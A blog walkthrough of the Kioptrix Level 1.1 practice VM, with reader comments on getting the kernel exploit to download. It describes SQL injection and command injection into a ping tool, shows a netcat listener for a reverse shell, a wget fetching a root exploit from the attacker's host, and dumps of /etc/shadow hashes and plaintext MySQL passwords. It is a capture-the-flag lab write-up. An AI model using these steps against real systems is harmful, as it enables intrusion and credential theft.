Address
304 North Cardinal St.
Dorchester Center, MA 02124

Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM

Kioptrix Level 1.1 (#2) Walkthrough

Well, next on my list (and reasonably so), was Kioptrix Level 1.2, again by loneferret, and still hosted on VulnHub.

To start things off, I fired up netdiscover to find the IP of this new VM.

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300
 __________________________________________________________________
    IP            At MAC Address      Count  Len   MAC Vendor       
 ------------------------------------------------------------------
 172.16.119.1    00:50:56:c0:00:01    03    180   VMWare, Inc.     
 172.16.119.254  00:50:56:ff:4e:a8    01    060   VMWare, Inc.     
 172.16.119.133  00:0c:29:53:19:4c    01    060   VMware, Inc.     

root@kali:~#

Next up was a quick Nmap scan to get an idea of the attack surface.

root@kali:~# nmap -sT -sV -O 172.16.119.133

Starting Nmap 6.47 ( http://nmap.org ) at 2015-04-29 09:43 EDT
Nmap scan report for 172.16.119.133
Host is up (0.00033s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http        Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind     2 (RPC #100000)
443/tcp  open  ssl/http    Apache httpd 2.0.52 ((CentOS)) 
631/tcp  open  ipp         CUPS 1.1
3306/tcp open  mysql       MySQL (unauthorized)
MAC Address: 00:0C:29:53:19:4C (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.89 seconds

With that completed, I figured I’d check out the home page to see if there was anything useful.


Based on the page and its source, this was some sort of Administrative console login, so it would be very useful if I could get in through this.

I decided to try some basic SQL injection to see if I could either get in, or at least get some sort of error condition to continue along that path.

That was easy. From here it looks like I had access to some sort of tool to ping a machine on the network.


It looked like it was just taking the IP address from the box, and appending it directly to a ping command…I decided to try and see if I could execute additional commands with a quick uname test.

Knowing that I could add additional commands at the end of the ping, I decided to try a quick and easy reverse bash shell that I saw on pentestmonkey.

On my attacker side, I setup netcat as my listener and waited. Shortly after executing the command in the web admin console, I had a shell.

root@kali:~# nc -l -p 4444
bash: no job control in this shell
bash-3.000$

A quick search showed that this kernel was probably vulnerable to the sock_sendpage() NULL pointer dereference exploit, so I downloaded it, copied it over, and compiled it.

bash-3.00$ cd /tmp
bash-3.00$ ls
ring0
ring0.c
bash-3.00$ rm ring0
bash-3.00$ rm ring0.c
bash-3.00$ wget http://172.16.119.128:8000/ring0.c
--02:30:20--  http://172.16.119.128:8000/ring0.c
           => `ring0.c'
Connecting to 172.16.119.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,380 (9.2K) [text/plain]

    0K .........                                100%  235.41 MB/s

05:50:45 (235.41 MB/s) - `ring0.c' saved [9380/9380]

bash-3.00$ gcc -o ring0 ring0.c

Fingers crossed, I executed it and got my root shell!

bash-3.00$ ./ring0
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

There was nothing interesting in the /root directory or root’s mail this time, but there were a few passwords and other interesting information inside of the .mysql_history file.

sh-3.00# cat .mysql_history
show databases;
create database webapp;
use webapp;
create table users(id INT,username varchar(100),password varchar(10));
show database;
select * from users;
show databases;
use webapp;
insert into users values(1,'admin','hello');
select * from users;
use mysql
show databases;
use mysql;
select * from users where user=john;
show tables;
select * from user where user=john;
select * from user where user='john';
select * from user;
create user 'john'@'localhost' identified by 'hiroshima';
create user 'webapp'@'localhost' identified by 'hiroshima';
create user 'webapp'@'localhost' IDENTIFIED BY 'hiroshima';
CREATE USER 'webapp'@'localhost' identified by 'hiroshima';
update user set password = password('hiroshima') where user = 'john';
use mysql;
show users;
select * from user;
create user 'john'@'localhost' identified by 'hiroshima';
version;
-v
;
help
flush privileges;
show databases;
use mysql;
grant select,insert,update,delete on *.* to 'john'@'localhost';
update user set password = password('hiroshima') where user = 'john';
flush priveleges;
use webapp;
show tables;
update user set password = password('Ha56!blaKAbl') where user = 'admin';
update username set password = password('Ha56!blaKAbl') where user = 'admin';
select * from users;
update username set password = password('Ha56!blaKAbl') where username = 'admin';
update users set password = password('Ha56!blaKAbl') where username = 'admin';
select * from users;
insert into users values(2,'john','66lajGGbla');
select * from users;

And, as I do whenever I remember, I dumped the shadow file for later/for others.

sh-3.00# cat /etc/shadow
root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::
bin:*:14525:0:99999:7:::
daemon:*:14525:0:99999:7:::
adm:*:14525:0:99999:7:::
lp:*:14525:0:99999:7:::
sync:*:14525:0:99999:7:::
shutdown:*:14525:0:99999:7:::
halt:*:14525:0:99999:7:::
mail:*:14525:0:99999:7:::
news:*:14525:0:99999:7:::
uucp:*:14525:0:99999:7:::
operator:*:14525:0:99999:7:::
games:*:14525:0:99999:7:::
gopher:*:14525:0:99999:7:::
ftp:*:14525:0:99999:7:::
nobody:*:14525:0:99999:7:::
dbus:!!:14525:0:99999:7:::
vcsa:!!:14525:0:99999:7:::
rpm:!!:14525:0:99999:7:::
haldaemon:!!:14525:0:99999:7:::
netdump:!!:14525:0:99999:7:::
nscd:!!:14525:0:99999:7:::
sshd:!!:14525:0:99999:7:::
rpc:!!:14525:0:99999:7:::
mailnull:!!:14525:0:99999:7:::
smmsp:!!:14525:0:99999:7:::
rpcuser:!!:14525:0:99999:7:::
nfsnobody:!!:14525:0:99999:7:::
pcap:!!:14525:0:99999:7:::
apache:!!:14525:0:99999:7:::
squid:!!:14525:0:99999:7:::
webalizer:!!:14525:0:99999:7:::
xfs:!!:14525:0:99999:7:::
ntp:!!:14525:0:99999:7:::
pegasus:!!:14525:0:99999:7:::
mysql:!!:14525::::::
john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::
harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::

While this level seemed to go a little quicker than the first one for me, I think I enjoyed it a little more than level 1 for the inclusion of SQL and command injection. Another solid beginner level VM from loneferret though, and I look forward to level 3.

4 Comments

  1. Hey doyler,
    I am using Kali linux 64-bit and it is NATed; when i am trying to wget ring0 exploit to the victim server, i am getting an error message saying “Http request sent, awaiting response 404 not found”.
    I have tried all possible things to put the exploit in the /tmp directory of the victim web server. Is there any work around?

    • Can you make sure that the target box can ping your attacking machine? If not, then there may be a connectivity issue.

      If it can, try the -4 flag with wget just in case one of the boxes is trying to use IPV6.

      If neither of those work, then let me know!

  2. Hey doyler,

    I finally understood my mistake, I had to place my ring0.c file in /var/www/html.

    This resolved the issue and I was able to root. Thanks ! for your help.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.